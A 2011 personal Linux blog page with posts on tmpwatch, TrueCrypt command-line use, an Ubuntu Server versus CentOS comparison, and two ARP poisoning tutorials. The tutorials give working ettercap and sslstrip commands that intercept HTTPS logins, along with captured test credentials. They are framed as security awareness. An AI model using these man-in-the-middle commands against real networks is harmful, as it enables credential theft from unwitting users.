Nov 29, 2011

The tmp directory and tmpwatch daemon

The tmp directory is normally used on Linux systems so that users or applications can store temporary information within it.

On Debian or Ubuntu distributions, the system cleans out all user data with each startup. On RHEL or CentOS 6, no operation is performed on that directory. But in version 5 of RHEL or CentOS, there was a great tool installed on the system by default, and utilized to periodically check the contents of the tmp directory: tmpwatch.

Tmpwatch is a cron job which takes care of removing files which have not been accessed for a period of time, or any file or folder that you configure. This operation is carried out based on guidelines which will be exposed later. The equivalent program on Debian/Ubuntu is tmpreaper, although you can compile tmpwatch perfectly for the aforementioned operating systems.

For the development of the present article, I am going to use CentOS 6.0 (32 bits).

[root@centos ~]# yum install tmpwatch

[root@centos ~]# cat /etc/cron.daily/tmpwatch 
#! /bin/sh
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
        -x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
        -X '/tmp/hsperfdata_*' 10d /tmp
/usr/sbin/tmpwatch "$flags" 30d /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
    if [ -d "$d" ]; then
        /usr/sbin/tmpwatch "$flags" -f 30d "$d"
    fi
done

By taking a look at the script launched daily by the system, we may observe that tmpwatch acts on a series of directories (/tmp, /var/tmp, /var/local, etc.) by clearing out their contents. This task is accomplished based on certain events which have taken place throughout the last 10 or 30 days.

  • -u (--atime): the decision to delete a file depends on its atime (access time).
  • -m (--mtime): the decision to delete a file depends on its mtime (modification time).
  • -c (--ctime): the decision to delete a file depends on its ctime (inode change time).
  • -f (--force): removes files even whether root does not have write access.

By means of the '-x' option, we can leave out a specific file or directory that matches the pattern.


Nov 22, 2011

TrueCrypt under the command line

I have an external hard drive (LG XD3, 500 GB) broken up into a couple of partitions, 450 and 50 GB respectively. The first partition is public and formatted with NTFS. The second one is formatted with ext4 and encrypted by means of TrueCrypt, and it is where I store my private data.

So far, I used TrueCrypt into graphical mode, but over time, I realize that it is more comfortable to handle the command line version (aside from I tend to rule out any kind of graphical tool whenever possible).

TrueCrypt is a powerful program which may cypher partitions, logical volumes, whole hard drives or even installed operating systems. The encryption is transparently and automatically carried out, and on top of all that, on real time (that is to say, on the fly). Another plus is the option to hide volumes and its performance, which is excellent.

One practical detail of TrueCrypt is that is not necessary to install it on the system. To that end, you have to download the Console-only-32-bit file (in my case, the 32-bit version), decompress the included binary and run it. Then, you will have to choose the second option: Extract package file truecrypt_7.1_console_i386.tar.gz and place it to /tmp. Within this tgz file is located the executable file of TrueCrypt.

I get used to drop off this binary file into the public partition of the external hard drive. Thereby, when I have to use it, I just have to get it from there.

javi@javi-ubuntu:/tmp$ cp /media/public/truecrypt/truecrypt . ; chmod +x truecrypt

javi@javi-ubuntu:/tmp$ ./truecrypt --version
TrueCrypt 7.1

First of all, I had to encrypt the partition. This is a long process and depends on the size of your partition. Below you may appreciate that the average speed was 26 MB/s.

In the next output, you can see that in order to create the cyphered partition (sdb2), I followed the text wizard provided by TrueCrypt. Other choice would have been to pass the parameters through the command line (--encryption, --size, etc.).

javi@javi-ubuntu:/tmp$ sudo ./truecrypt -c
Volume type:
 1) Normal
 2) Hidden
Select [1]: 1

Enter volume path: /dev/sdb2

Encryption algorithm:
 1) AES
 2) Serpent
 3) Twofish
 4) AES-Twofish
 5) AES-Twofish-Serpent
 6) Serpent-AES
 7) Serpent-Twofish-AES
 8) Twofish-Serpent
Select [1]: 1

Hash algorithm:
 1) RIPEMD-160
 2) SHA-512
 3) Whirlpool
Select [1]: 1

Filesystem:
 1) None
 2) FAT
 3) Linux Ext2
 4) Linux Ext3
 5) Linux Ext4
Select [2]: 5

Enter password: 
Re-enter password: 

Enter keyfile path [none]: 

Please type at least 320 randomly chosen characters and then press Enter:


Done: 100.000%  Speed:   26 MB/s  Left: 0 s                

The TrueCrypt volume has been successfully created.

Once you have created the encrypted partition (remember that my example is based on a partition, but you can also cypher a file or logical volume), the procedure is pretty easy. When you want to work with that safe area, you only have to mount it by means of TrueCrypt.

javi@javi-ubuntu:/tmp$ mkdir /mnt/truecrypt

javi@javi-ubuntu:/tmp$ sudo ./truecrypt /dev/sdb2 /mnt/truecrypt
Enter password for /dev/sdb2: 
Enter keyfile [none]: 
Protect hidden volume (if any)? (y=Yes/n=No) [No]:

javi@javi-ubuntu:/tmp$ ./truecrypt --list
1: /dev/sdb2 /dev/mapper/truecrypt1 /mnt/truecrypt

By running the following command, you may collect more details about a mounted volume.

javi@javi-ubuntu:/tmp$ ./truecrypt --volume-properties /dev/sdb2
Slot: 1
Volume: /dev/sdb2
Virtual Device: /dev/mapper/truecrypt1
Mount Directory: /mnt/truecrypt
Size: 50.0 GB
Type: Normal
Read-Only: No
Hidden Volume Protected: No
Encryption Algorithm: AES
Primary Key Size: 256 bits
Secondary Key Size (XTS Mode): 256 bits
Block Size: 128 bits
Mode of Operation: XTS
PKCS-5 PRF: HMAC-RIPEMD-160
Volume Format Version: 2
Embedded Backup Header: Yes

You can dismount it by executing the next order.

javi@javi-ubuntu:/tmp$ sudo ./truecrypt --dismount /mnt/truecrypt

TrueCrypt has got many more options through the command line. I invite you to take a look at them by checking its help.

And finally, I would like to conclude this article by writing down the order (based on rsync) that I usually run to back up my data into the private partiton.

javi@javi-ubuntu:~$ rsync -altgvb --delete /data /mnt/truecrypt/


Nov 15, 2011

ARP poisoning (III)

During the first article about ARP poisoning (I), we learnt the danger of connecting to a service by using a non-secure protocol, such as HTTP, FTP, SMTP and so on. The username and password are passed down in clear, and anyone could sniff them.

Ok, that's right, so we have to use safe protocols (HTTPS, SSH, FTPS, etc.). But what occurs whether the digital certificate utilized to authenticate and encrypt the communication is changed on the fly? That is just what we studied in the second article about ARP poisoning (II). The bottom line was that we always have to pay attention when we load a webpage and, we must only accept a trusted certificate.

What would happen if one day we are a little bit asleep and we do not realize that we are using HTTP rather than HTTPS? What? How is it possible that I am logging in to my bank account and that access is not provided through HTTPS? Well you should believe it.

Bellow you can look into the normal login in the Oracle website, both Firefox and Google Chrome. You may observe that both accesses are correctly served by means of HTTPS.




Imagine for a moment that an intruder carries out a poisoning attack between you and the router, in order to intercept all data transmitted. Then, he sets up a tool like sslstrip to establish two TCP communications. On the one hand, a first HTTPS connection between him and the Oracle web, by using the real certificate offered by Oracle, and on the other, a second HTTP connection between him and you. This is the target of sslstrip, to take advantage of a Man in the Middle attack (MitM) for tapping SSL/TLS conversations.

root@attacker:~# aptitude install sslstrip

root@attacker:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000

root@attacker:~# sslstrip -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

After running ettercap and forwarding all HTTP traffic to port 10000 (default port used by sslstrip), if the victim tries to open the aforementioned HTTPS Oracle web page, it will turn up the HTTP version of the site (sslstrip takes care of transforming the preceding content sent out by Oracle and serves it to the victim through a HTTP session).

The following figures show the manipulated web page created by sslstrip.




If the victim attempts to sign in, the credentials will be catched by the attacker.

root@attacker:~# cat victim.log
...
2011-11-05 19:51:47,876 POST Data (login.oracle.com):
...
AD91DC75E382F4E9ACDC66D839F095558488AA1754EB29D4513F832B83CB31BF05DB93ACCC18255184E5296825625A56EA6&locale=&ssousername=test%40mytest.com&password=test2

Ok, perfect, so to get out of this kind of attack, first of all, we must have a good cup of coffe every morning, ;-), and second, to be very careful when we surf the Internet. At any rate, as commented in the first post, the end of this series of articles is to present later a great tool which will help us to shut out this sort of problems.

Carrying on with sslstrip, it still holds a last trick: to be able to draw a padlock icon in the navigation bar.

root@attacker:~# sslstrip -f -w victim.log
sslstrip 0.9 by Moxie Marlinspike running...

You can take a look at it in both browsers.




It is very important to underline the risks of this type of attack. You could check it out with hundreds of websites (banks, e-commerce, sports betting, etc.) and in the most of them, you could be spoofed. But I have also seen that there are other webs such as PayPal, where the altered web page does not work out very well.


Nov 8, 2011

Ubuntu Server instead of CentOS?

Although both are outstanding Linux distributions, nowadays I choose Ubuntu Server. For a long time, I have prefered CentOS rather than Ubuntu Server, but today, I always install Ubuntu Server unless there is some requirement which forces me to do the opposite (for instance, when some application just is supported for CentOS/RHEL).

I am not going to focus on certain details such as the performance, architecture, support and so on. I only want to talk about those simple things that, when I finish the installation of an operating system, I usually say: I like it!

For my tests, I am going to use two similar versions: Ubuntu Server 10.04 LTS and CentOS 6.0, both 32 bits. After the initial installation (and their corresponding upgrades), here you are a typical view of the system status. As you can distinguish, Ubuntu Server grabs little memory, since the most of it is cached. In respect of the number of active processes, it also has got fewer than CentOS.

root@ubuntu-server:~# top
top - 12:17:54 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  78 total,   1 running,  77 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2061260k total,   126644k used,  1934616k free,    17088k buffers
Swap:   565240k total,        0k used,   565240k free,    87796k cached
...

[root@centos ~]# top
top - 12:17:49 up 13 min,  1 user,  load average: 0.00, 0.00, 0.00
Tasks:  84 total,   1 running,  83 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2071620k total,    99020k used,  1972600k free,     5272k buffers
Swap:  4161528k total,        0k used,  4161528k free,    29488k cached
...

What about the initial space taken up for the installation? (In order to get a more accurate result, I have cleaned the package cache). As you can see, CentOS occupies around 225 MB less than Ubuntu Server. I have to highlight this point, because this aspect has improved a lot on CentOS 6.0, since we have now a version of minimal installation. With CentOS 5, the final size was bigger.

root@ubuntu-server:~# aptitude clean

root@ubuntu-server:~# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/ubuntu--server-root
                       12G  888M  9.6G   9% /
none                 1002M  172K 1002M   1% /dev
none                 1007M     0 1007M   0% /dev/shm
none                 1007M   32K 1007M   1% /var/run
none                 1007M     0 1007M   0% /var/lock
none                 1007M     0 1007M   0% /lib/init/rw
/dev/sda1             228M   31M  185M  15% /boot

[root@centos ~]# yum clean all

[root@centos ~]# df -h
S.ficheros            Size  Used Avail Use% Montado en
/dev/mapper/vg_centos-lv_root
                      7,5G  664M  6,4G  10% /
tmpfs                1012M     0 1012M   0% /dev/shm
/dev/sda1             485M   56M  404M  13% /boot

This situation is reflected as well when we take a look at the number of packages installed on the system.

root@ubuntu-server:~# dpkg -l | grep ii | wc -l
358

[root@centos ~]# yum list installed | wc -l
234

Let's move on to the services which are listening on the system at the beginning. You may appreciate that the picture of Ubuntu Server is impeccable. There is no process bound to any port (aside from SSH). But what happens with CentOS? There are different applications which have already been started up (TCP and UDP). This is a waste of time for me, because at the end of each CentOS installation, I have to remove them.

root@ubuntu-server:~# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      810/sshd        
tcp6       0      0 :::22                   :::*                    LISTEN      810/sshd 

[root@centos ~]# netstat -nltup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1071/rpcbind        
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      1191/sshd           
tcp        0      0 0.0.0.0:44568               0.0.0.0:*                   LISTEN      1089/rpc.statd      
tcp        0      0 :::111                      :::*                        LISTEN      1071/rpcbind        
tcp        0      0 :::55445                    :::*                        LISTEN      1089/rpc.statd      
tcp        0      0 :::22                       :::*                        LISTEN      1191/sshd           
udp        0      0 0.0.0.0:822                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 0.0.0.0:841                 0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:45143               0.0.0.0:*                               1089/rpc.statd      
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               1071/rpcbind        
udp        0      0 :::822                      :::*                                    1071/rpcbind        
udp        0      0 :::43338                    :::*                                    1089/rpc.statd      
udp        0      0 :::111                      :::*                                    1071/rpcbind 

Regarding the repositories provided for each distribution, Ubuntu Server supplies a larger number of packages than CentOS, and this is another plus. Although you can add excelent additional repositories such as EPEL, those extra packages are not officialy supported.

root@ubuntu-server:~# apt-cache stats | grep Normal
  Normal packages: 30299

[root@centos ~]# yum list all | wc -l
4595

Also point out the life cycle of each distribution. On Ubuntu Server you have got a LTS (Long Term Support) version each three years. In contrast, on CentOS, the first release of the branch 5 was shipped in March 2007 and CentOS 6.0, in July 2011 (more than four years after). What goes on with this? Over time, you have to use an operating system where the most of the packages, although still supported, are obsoleted.

And finally, I have metered the time spent in order to reboot the system (both use Upstart). This parameter is really important, mainly in production environments. I have obtained 20 seconds on Ubuntu Server and 40 on CentOS.


Nov 2, 2011

ARP poisoning (II)

During the last article, ARP poisoning (I), you were able to learn the risks of using non-secure protocols inside an unreliable network. At any moment, your connection credentials can be captured by any intruder and you will not be aware of that. Note that this situation can be very common when you surf the Internet and go to HTTP websites, or for example, when you log into your MSN account.

So what happens with secure protocols such as HTTPS? That is to say, for instance when you access your online bank account, PayPal, Gmail, LinkedIn and so on. Are you safe? In most cases, that will depend on you.

Let's go over the normal behavior of a secure site like Facebook. If you click with the left mouse button on facebook.com (in the web browser bar, once you have opened the site), you will be able to appreciate that the connection to the web is encrypted and verified by DigiCert Inc (certification authority).




By pressing on the More Information button, you may take a look at the features of the digital certificate offered by Facebook. As you can pick out in the first screen, the certificate has been issued by DigiCert Inc to Facebook, and in the second one, it is made up by a valid Certificate Hierarchy.




Now we are going to use another audit tool: Ettercap (NG-0.7.3). This program is aimed at sniffing switched LANs, by supporting active and passive analysis of many protocols (HTTP, FTP, POP, IMAP, NFS, etc.), even ciphered ones.

In addition, it includes many options for network and host inspection, data injection in an established connection, lots of loadable modules at runtime, also known as plugins (arp_cop - report suspicious ARP activity -, dos_attack - run a DoS against a victim -, finger - fingerprint a remote host -, etc.), several MitM attacks (ARP poisoning, ICMP redirection, DHCP spoofing and port stealing) and so on.

The victim computer is going to open Facebook (HTTPS) through a web browser (Firefox). Therefore, the victim will go out across the router so as to reach Facebook via Internet.

Ettercap will be utilized in order to poison both elements, victim and router, to sniff all traffic between them. So how can the attacker capture the password, whether this one is sent out through the secure channel previously set up? First up, the traffic between the victim and Facebook is not going directly to the router, but that it will pass through the attacker, which will be picking up all data.

Thereby, on the one hand the attacker will establish an HTTPS connection between itself and Facebook by using the correct certificate issued by Facebook, and on the other, another HTTPS connection between itself and the victim, but this time, by means of a fake certificate created on the fly and which will have all fields filled according to the real certificate presented by Facebook.

Let's get started by editing the configuration file of Ettercap, in order to enable the iptables command to allow the TCP redirection at kernel level, so as to be able to handle SSL dissection.

root@attacker:~# aptitude install ettercap

root@attacker:~# cat /etc/etter.conf
...
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default
...
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
...

Now we are ready to run Ettercap by spoofing both targets and activating the ARP poisoning MitM attack. The 'remote' parameter is set in order to capture the connections which pass through the router, otherwise just the connections between them would be catched.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->       00:0C:29:20:9F:9B      192.168.1.20     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.1.1 00:60:B3:50:AB:45

 GROUP 2 : 192.168.1.10 00:0C:29:69:81:47
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


At this moment, if you open Facebook again, Firefox will warn you that it cannot confirm that the connection is secure. Normally, when you try to connect securely, sites such as banks, stores, public organisms, etc., present trusted identifications to prove that you are going to the right place.




If you confirm the security exception and accept the digital certificate, you will have fallen into the trap of the attacker. Let's review the characteristics of this invalid certificate, so as to be able to compare it with the real certificate (second figure).




As you can make out in the general features of the fake certificate, only the fingerprints are modified, because of the attacker has signed it with him private key. Besides, the undependable certificate does not present a correct hierarchy.

Now if you attempt to login into Facebook, your credentials will be catched by the attacker.

root@attacker:~# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.10/
...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.171.224.39:443 -> USER: test@mytest.com  PASS: test1  INFO: https://www.facebook.com/